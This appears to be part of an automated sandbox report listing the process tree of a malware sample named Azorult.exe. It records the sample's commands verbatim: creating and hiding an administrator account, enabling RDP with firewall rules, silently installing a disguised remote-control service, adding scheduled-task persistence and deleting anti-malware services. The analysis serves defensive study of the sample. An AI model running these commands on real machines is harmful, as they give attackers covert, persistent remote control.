    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10032 -childID 20 -isForBrowser -prefsHandle 10112 -prefMapHandle 10108 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {509da199-fb09-46e1-9bd7-c0cf359b6de5} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9376 -childID 21 -isForBrowser -prefsHandle 9492 -prefMapHandle 9496 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2afb8149-6194-44a4-8260-c5969f19c133} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:6468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8140 -childID 22 -isForBrowser -prefsHandle 8176 -prefMapHandle 8180 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f3506fb-ada3-425a-9b8c-1cfc5489650b} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:6972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10576 -childID 23 -isForBrowser -prefsHandle 10648 -prefMapHandle 10652 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebe35015-393f-4d39-92cd-d784e44f8fe9} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:7068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10568 -childID 24 -isForBrowser -prefsHandle 10636 -prefMapHandle 10640 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb024cea-dcfc-4a72-af01-2844e0f255a1} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:7076
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10676 -childID 25 -isForBrowser -prefsHandle 8768 -prefMapHandle 10532 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d85e2c6-4fcb-4863-a6a4-f6e6a12c99ae} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:7092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10764 -childID 26 -isForBrowser -prefsHandle 10272 -prefMapHandle 8684 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {951e7c3c-5169-46d3-a562-ecc73c0417a0} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11000 -childID 27 -isForBrowser -prefsHandle 10860 -prefMapHandle 10856 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7283cf8b-b61e-4aa7-8284-b966c0f034f4} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5208

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:1148

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x2f8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5424

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6312
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:6300
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    PID:6112

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7432

C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:7964
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:8152
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:7444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:1592
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:7592
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:5244
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:7628
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:6724
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:7672
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3724
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:7892
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:7896
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:8004
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:8020
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:8064
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:7504
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:8032
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:7628
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:7824
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4640
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        Checks computer location settings
        
        PID:7428
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Checks computer location settings
        Modifies registry class
        
        PID:8016
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7256
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6724
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:2004
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:5368
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7808
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:5340
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        Checks computer location settings
        
        PID:7868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:7816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:7528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:8188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:8160
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:8036
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:7756
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:7308
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:7580
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5344
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:748
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:8172
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:7268
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:7608
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:5976
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:6628
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:7560
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:7652
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:7512
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7276
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:7444
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        Hide Artifacts: Hidden Users
        
        PID:1288
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:4212
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:7652
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:6124
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5520
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7412
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:7932
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:748
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:8060
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\828F.tmp\82A0.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:7844
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:7528
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:5940
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7764
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2004
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "svchost" /F
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:7900
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "svchost" /F
        7⤵
        
        PID:7808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:7624
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7756
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:5080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:7340
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5948
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:4812
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7548
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:5416
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:2844
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3600
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1132
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2408
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7380
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:7676
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:5916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:6844
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:7440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:7396
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:7772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:6024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5976
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:3744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7884
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:8028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:6112
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:7556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:7464
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:7564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:7620
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:5244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:7284
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:7468
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:7428
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:7624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:5164
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:7976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:8076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:8004
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:6312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:8124
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:4252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7240
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:8164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:8152
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:6112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:7444
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:7560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:7480
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7292
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7528
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:5732
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:7752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5980
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7296
- C:\Windows\SysWOW64\cmd.exe
